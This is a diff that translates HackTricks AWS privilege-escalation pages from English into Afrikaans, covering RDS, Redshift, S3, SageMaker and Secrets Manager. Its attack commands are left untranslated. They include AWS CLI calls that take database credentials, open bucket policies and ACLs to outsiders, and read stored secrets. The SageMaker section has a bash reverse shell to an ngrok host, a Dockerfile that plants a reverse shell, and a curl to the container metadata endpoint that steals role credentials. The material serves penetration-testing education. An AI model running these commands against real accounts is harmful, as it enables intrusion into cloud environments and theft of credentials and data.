verkry of die data binne die instantie verander. > [!WARNING] -> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): - -> - The profile must exist in your account. -> - The profile must have an IAM role that Amazon EC2 has permissions to assume. -> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . +> Sommige vereistes van die rol/instansie-profiel om aan te heg (van [**hier**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): +> - Die profiel moet in jou rekening bestaan. +> - Die profiel moet 'n IAM-rol hĂȘ wat Amazon EC2 toestemming het om aan te neem. 
+> - Die instansie-profielnaam en die geassosieerde IAM-rolnaam moet met die voorvoegsel `AWSRDSCustom` begin. ```bash aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. +**PotensiĂ«le Impak**: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie. ### `rds:AddRoleToDBInstance`, `iam:PassRole` -An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. +'n Aanvaller met die regte `rds:AddRoleToDBInstance` en `iam:PassRole` kan **'n gespesifiseerde rol aan 'n bestaande RDS-instantie voeg**. Dit kan die aanvaller in staat stel om **toegang tot sensitiewe data** te verkry of die data binne die instantie te wysig. > [!WARNING] -> The DB instance must be outside of a cluster for this - +> Die DB-instantie moet buite 'n kluster wees vir dit ```bash aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name ``` - -**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. +**PotensiĂ«le Impak**: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instansie. {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md index 825c16ad6..888e36291 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md @@ -4,7 +4,7 @@ ## Redshift -For more information about RDS check: +Vir meer inligting oor RDS, kyk: {{#ref}} ../aws-services/aws-redshift-enum.md 
@@ -12,52 +12,45 @@ For more information about RDS check: ### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - +Met hierdie toestemmings kan jy **inligting van al die klusters** verkry (insluitend naam en kluster gebruikersnaam) en **kredensiale** kry om toegang te verkry: ```bash # Get creds aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 # Connect, even if the password is a base64 string, that is the password psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 ``` - -**Potential Impact:** Find sensitive info inside the databases. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die databasisse. ### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - +Met hierdie toestemmings kan jy **inligting van al die klusters** kry en **kredensiale** verkry om toegang te verkry.\ +Let daarop dat die postgres gebruiker die **toestemmings sal hĂȘ wat die IAM identiteit** wat gebruik is om die kredensiale te verkry, het. ```bash # Get creds aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 # Connect, even if the password is a base64 string, that is the password psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 ``` - -**Potential Impact:** Find sensitive info inside the databases. +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die databasisse. 
### `redshift:DescribeClusters`, `redshift:ModifyCluster?` -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - +Dit is moontlik om die **hoofwagwoord** van die interne postgres (redshit) gebruiker vanaf aws cli te **wysig** (Ek dink dit is die regte toestemmings wat jy nodig het, maar ek het dit nog nie getoets nie): ``` aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; ``` +**PotensiĂ«le Impak:** Vind sensitiewe inligting binne die databasisse. -**Potential Impact:** Find sensitive info inside the databases. - -## Accessing External Services +## Toegang tot Eksterne Dienste > [!WARNING] -> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. +> Om toegang te verkry tot al die volgende hulpbronne, sal jy **die rol wat gebruik moet word** moet **specifiseer**. 'n Redshift-kluster **kan 'n lys van AWS-rolle toegeken hĂȘ** wat jy kan gebruik **as jy die ARN ken** of jy kan net "**default**" stel om die standaard een wat toegeken is, te gebruik. 
-> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` +> Boonop, soos [**hier verduidelik**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), laat Redshift ook toe om rolle te concat (solank die eerste een die tweede een kan aanvaar) om verdere toegang te verkry, maar net **deur** hulle met 'n **komma** te **skei**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` ### Lambdas -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - +Soos verduidelik in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), is dit moontlik om **'n lambda-funksie vanaf redshift aan te roep** met iets soos: ```sql CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) RETURNS INT @@ -65,11 +58,9 @@ STABLE LAMBDA 'lambda_function' IAM_ROLE default; ``` - ### S3 -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - +Soos verduidelik in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), is dit moontlik om **te lees en te skryf in S3-buckets**: ```sql # Read copy table from 's3:///load/key_prefix' 
@@ -82,30 +73,23 @@ unload ('select * from venue') to 's3://mybucket/tickit/unload/venue_' iam_role default; ``` - ### Dynamo -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - +Soos verduidelik in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), is dit moontlik om **data van dynamodb te verkry**: ```sql copy favoritemovies from 'dynamodb://ProductCatalog' iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; ``` - > [!WARNING] -> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. +> Die Amazon DynamoDB tabel wat die data verskaf, moet in dieselfde AWS Region as jou kluster geskep word, tensy jy die [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) opsie gebruik om die AWS Region aan te dui waarin die Amazon DynamoDB tabel geleĂ« is. ### EMR -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) +Kyk na [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) ## References - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md index 0af161cbc..c04a94f6f 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md 
@@ -6,117 +6,112 @@ ### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject` -An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges. - -For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy: +'n Aanvaller met daardie toestemmings oor interessante emmers mag in staat wees om hulpbronne te kapen en voorregte te verhoog. +Byvoorbeeld, 'n aanvaller met daardie **toestemmings oor 'n cloudformation-emmer** genaamd "cf-templates-nohnwfax6a6i-us-east-1" sal in staat wees om die ontplooiing te kapen. Die toegang kan gegee word met die volgende beleid: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "s3:PutBucketNotification", - "s3:GetBucketNotification", - "s3:PutObject", - "s3:GetObject" - ], - "Resource": [ - "arn:aws:s3:::cf-templates-*/*", - "arn:aws:s3:::cf-templates-*" - ] - }, - { - "Effect": "Allow", - "Action": "s3:ListAllMyBuckets", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": [ +"s3:PutBucketNotification", +"s3:GetBucketNotification", +"s3:PutObject", +"s3:GetObject" +], +"Resource": [ +"arn:aws:s3:::cf-templates-*/*", +"arn:aws:s3:::cf-templates-*" +] +}, +{ +"Effect": "Allow", +"Action": "s3:ListAllMyBuckets", +"Resource": "*" +} +] } ``` - -And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**. 
+En die kaping is moontlik omdat daar 'n **klein tydvenster is vanaf die oomblik dat die sjabloon na die emmer opgelaai word** tot die oomblik dat die **sjabloon ontplooi word**. 'n Aanvaller kan eenvoudig 'n **lambda-funksie** in sy rekening skep wat **geaktiveer word wanneer 'n emmer kennisgewing gestuur word**, en **kap** die **inhoud** van daardie **emmer**. ![](<../../../images/image (174).png>) -The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\ -For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) +Die Pacu-module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) kan gebruik word om hierdie aanval te outomatiseer.\ +Vir meer inligting, kyk na die oorspronklike navorsing: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) ### `s3:PutObject`, `s3:GetObject` -These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\ -An attacker with **read access** to them might find **sensitive information** on them.\ -An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\ -These are some examples: +Dit is die toestemmings om **objekte na S3 te kry en op te laai**. 
Verskeie dienste binne AWS (en buite dit) gebruik S3-stoor om **konfigurasie lĂȘers** te stoor.\ +'n Aanvaller met **lees toegang** tot hulle kan **sensitiewe inligting** daarop vind.\ +'n Aanvaller met **skryf toegang** tot hulle kan **die data wysig om 'n diens te misbruik en probeer om voorregte te verhoog**.\ +Hierdie is 'n paar voorbeelde: -- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. +- As 'n EC2-instantie die **gebruikersdata in 'n S3-emmer** stoor, kan 'n aanvaller dit wysig om **arbitraire kode binne die EC2-instantie uit te voer**. ### `s3:PutBucketPolicy` -An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets. - +'n Aanvaller, wat moet wees **van dieselfde rekening**, anders sal die fout `Die gespesifiseerde metode is nie toegelaat nie` geaktiveer word, met hierdie toestemming sal in staat wees om vir homself meer toestemmings oor die emmer(s) toe te ken wat hom toelaat om emmers te lees, te skryf, te wysig, te verwyder en bloot te stel. 
```bash # Update Bucket policy aws s3api put-bucket-policy --policy file:///root/policy.json --bucket ## JSON giving permissions to a user and mantaining some previous root access { - "Id": "Policy1568185116930", - "Version":"2012-10-17", - "Statement":[ - { - "Effect":"Allow", - "Principal":{ - "AWS":"arn:aws:iam::123123123123:root" - }, - "Action":"s3:ListBucket", - "Resource":"arn:aws:s3:::somebucketname" - }, - { - "Effect":"Allow", - "Principal":{ - "AWS":"arn:aws:iam::123123123123:user/username" - }, - "Action":"s3:*", - "Resource":"arn:aws:s3:::somebucketname/*" - } - ] +"Id": "Policy1568185116930", +"Version":"2012-10-17", +"Statement":[ +{ +"Effect":"Allow", +"Principal":{ +"AWS":"arn:aws:iam::123123123123:root" +}, +"Action":"s3:ListBucket", +"Resource":"arn:aws:s3:::somebucketname" +}, +{ +"Effect":"Allow", +"Principal":{ +"AWS":"arn:aws:iam::123123123123:user/username" +}, +"Action":"s3:*", +"Resource":"arn:aws:s3:::somebucketname/*" +} +] } ## JSON Public policy example ### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS { - "Id": "Policy1568185116930", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Stmt1568184932403", - "Action": [ - "s3:ListBucket" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome", - "Principal": "*" - }, - { - "Sid": "Stmt1568185007451", - "Action": [ - "s3:GetObject" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome/*", - "Principal": "*" - } - ] +"Id": "Policy1568185116930", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Stmt1568184932403", +"Action": [ +"s3:ListBucket" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome", +"Principal": "*" +}, +{ +"Sid": "Stmt1568185007451", +"Action": [ +"s3:GetObject" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome/*", +"Principal": "*" +} +] } ``` - ### `s3:GetBucketAcl`, `s3:PutBucketAcl` -An attacker could abuse these permissions to **grant him more 
access** over specific buckets.\ -Note that the attacker doesn't need to be from the same account. Moreover the write access - +'n Aanvaller kan hierdie toestemmings misbruik om **hom meer toegang te gee** oor spesifieke emmers.\ +Let daarop dat die aanvaller nie van dieselfde rekening hoef te wees nie. Boonop is die skryftoegang ```bash # Update bucket ACL aws s3api get-bucket-acl --bucket @@ -125,27 +120,25 @@ aws s3api put-bucket-acl --bucket --access-control-policy file://a ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### `s3:GetObjectAcl`, `s3:PutObjectAcl` -An attacker could abuse these permissions to grant him more access over specific objects inside buckets. - +'n Aanvaller kan hierdie toestemmings misbruik om hom meer toegang tot spesifieke voorwerpe binne emmers te verleen. ```bash # Update bucket object ACL aws s3api get-object-acl --bucket --key flag 
@@ -154,34 +147,27 @@ aws s3api put-object-acl --bucket --key flag --access-control-poli ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl` -An attacker with these privileges is expected to be able to put an Acl to an specific object version - +'n Aanvaller met hierdie voorregte word verwag om 'n Acl op 'n spesifieke objekweergawe te kan plaas ```bash aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --version-id --access-control-policy file://objacl.json ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index 890686262..e5c8a2483 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md 
@@ -6,68 +6,60 @@ ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` -Start creating a noteboook with the IAM Role to access attached to it: - +Begin om 'n notaboek te skep met die IAM Rol wat daaraan gekoppel is: ```bash aws sagemaker create-notebook-instance --notebook-instance-name example \ - --instance-type ml.t2.medium \ - --role-arn arn:aws:iam:::role/service-role/ +--instance-type ml.t2.medium \ +--role-arn arn:aws:iam:::role/service-role/ ``` - -The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready: - +Die antwoord moet 'n `NotebookInstanceArn` veld bevat, wat die ARN van die nuut geskepte notaboekinstansie sal bevat. Ons kan dan die `create-presigned-notebook-instance-url` API gebruik om 'n URL te genereer wat ons kan gebruik om toegang tot die notaboekinstansie te verkry sodra dit gereed is: ```bash aws sagemaker create-presigned-notebook-instance-url \ - --notebook-instance-name +--notebook-instance-name ``` +Navigeer na die URL met die blaaier en klik op \`Open JupyterLab\` in die boonste regterkant, scroll dan af na die “Launcher” oortjie en onder die “Other” afdeling, klik die “Terminal” knoppie. -Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. +Nou is dit moontlik om toegang te verkry tot die metadata geloofsbriewe van die IAM Rol. -Now It's possible to access the metadata credentials of the IAM Role. - -**Potential Impact:** Privesc to the sagemaker service role specified. +**PotensiĂ«le Impak:** Privesc na die sagemaker diensrol wat gespesifiseer is. 
### `sagemaker:CreatePresignedNotebookInstanceUrl` -If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**. - +As daar Jupyter **notebooks reeds aan die gang is** daarop en jy kan hulle lys met `sagemaker:ListNotebookInstances` (of hulle op enige ander manier ontdek). Jy kan **'n URL vir hulle genereer, toegang tot hulle verkry, en die geloofsbriewe steel soos aangedui in die vorige tegniek**. ```bash aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name ``` - -**Potential Impact:** Privesc to the sagemaker service role attached. +**PotensiĂ«le Impak:** Privesc na die sagemaker diensrol wat aangeheg is. ### `sagemaker:CreateProcessingJob,iam:PassRole` -An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**. - +'n Aanvaller met daardie toestemmings kan **sagemaker 'n verwerkingswerk** laat uitvoer met 'n sagemaker rol wat daaraan geheg is. Die aanvaller kan die definisie van die houer aandui wat in 'n **AWS bestuurde ECS rekening instance** uitgevoer sal word, en **die geloofsbriewe van die aangehegte IAM rol steel**. 
```bash # I uploaded a python docker image to the ECR aws sagemaker create-processing-job \ - --processing-job-name privescjob \ - --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ - --app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ - --role-arn +--processing-job-name privescjob \ +--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ +--app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ +--role-arn # In my tests it took 10min to receive the shell curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds ``` - -**Potential Impact:** Privesc to the sagemaker service role specified. +**PotensiĂ«le Impak:** Privesc na die sagemaker diensrol wat gespesifiseer is. ### `sagemaker:CreateTrainingJob`, `iam:PassRole` -An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. +'n Aanvaller met daardie toestemmings sal in staat wees om 'n opleidingswerk te skep, **wat 'n arbitrĂȘre houer** daarop laat loop met 'n **rol wat daaraan geheg is**. Daarom sal die aanvaller in staat wees om die akrediteer van die rol te steel. > [!WARNING] -> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). 
+> Hierdie scenario is moeiliker om te benut as die vorige een omdat jy 'n Docker beeld moet genereer wat die rev shell of creds direk na die aanvaller sal stuur (jy kan nie 'n beginopdrag in die konfigurasie van die opleidingswerk aandui nie). > > ```bash -> # Create docker image +> # Skep docker beeld > mkdir /tmp/rev -> ## Note that the trainning job is going to call an executable called "train" -> ## That's why I'm putting the rev shell in /bin/train -> ## Set the values of and +> ## Let daarop dat die opleidingswerk 'n uitvoerbare genaamd "train" gaan aanroep +> ## Daarom plaas ek die rev shell in /bin/train +> ## Stel die waardes van en > cat > /tmp/rev/Dockerfile < FROM ubuntu > RUN apt update && apt install -y ncat curl 
@@ -79,40 +71,34 @@ An attacker with those permissions will be able to create a training job, **runn > cd /tmp/rev > sudo docker build . -t reverseshell > -> # Upload it to ECR +> # Laai dit op na ECR > sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ > sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest > sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest > ``` - ```bash # Create trainning job with the docker image created aws sagemaker create-training-job \ - --training-job-name privescjob \ - --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ - --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ - --role-arn \ - --output-data-config '{"S3OutputPath": "s3://"}' \ - --stopping-condition '{"MaxRuntimeInSeconds": 600}' +--training-job-name privescjob \ +--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ +--algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ +--role-arn \ +--output-data-config '{"S3OutputPath": "s3://"}' \ +--stopping-condition '{"MaxRuntimeInSeconds": 600}' #To get the creds curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer ``` - -**Potential Impact:** Privesc to the sagemaker service role specified. +**PotensiĂ«le Impak:** Privesc na die sagemaker diensrol gespesifiseer. 
### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` -An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ -&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ +'n Aanvaller met daardie toestemmings sal (potensieel) in staat wees om 'n **hyperparameter opleidingswerk** te skep, **'n arbitrĂȘre houer** daarop te laat loop met 'n **rol aangeheg** daaraan.\ +&#xNAN;_I het nie uitgebuit nie weens die gebrek aan tyd, maar dit lyk soortgelyk aan die vorige uitbuitings, voel vry om 'n PR met die uitbuitingsbesonderhede te stuur._ -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md index bdc01433b..d3ef36d44 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md @@ -4,7 +4,7 @@ ## Secrets Manager -For more info about secrets manager check: +Vir meer inligting oor secrets manager, kyk: {{#ref}} ../aws-services/aws-secrets-manager-enum.md 
@@ -12,44 +12,34 @@ For more info about secrets manager check: ### `secretsmanager:GetSecretValue` -An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. - +'n Aanvaller met hierdie toestemming kan die **gestoor waarde binne 'n geheim** in AWS **Secretsmanager** verkry. ```bash aws secretsmanager get-secret-value --secret-id # Get value ``` - -**Potential Impact:** Access high sensitive data inside AWS secrets manager service. +**PotensiĂ«le Impak:** Toegang tot hoogs sensitiewe data binne die AWS secrets manager diens. ### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) -With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). - +Met die vorige toestemmings is dit moontlik om **toegang te gee aan ander principals/rekeninge (selfs eksterne)** om die **geheim** te bekom. Let daarop dat om **geheime wat met 'n KMS-sleutel versleut is** te **lees**, die gebruiker ook **toegang tot die KMS-sleutel** moet hĂȘ (meer inligting op die [KMS Enum bladsy](../aws-services/aws-kms-enum.md)). 
```bash aws secretsmanager list-secrets aws secretsmanager get-resource-policy --secret-id aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json ``` - -policy.json: - +beleid.json: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "secretsmanager:GetSecretValue", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "secretsmanager:GetSecretValue", +"Resource": "*" +} +] } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md index 699bb58cf..a43e89386 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md @@ -4,7 +4,7 @@ ## SNS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-sns-enum.md 
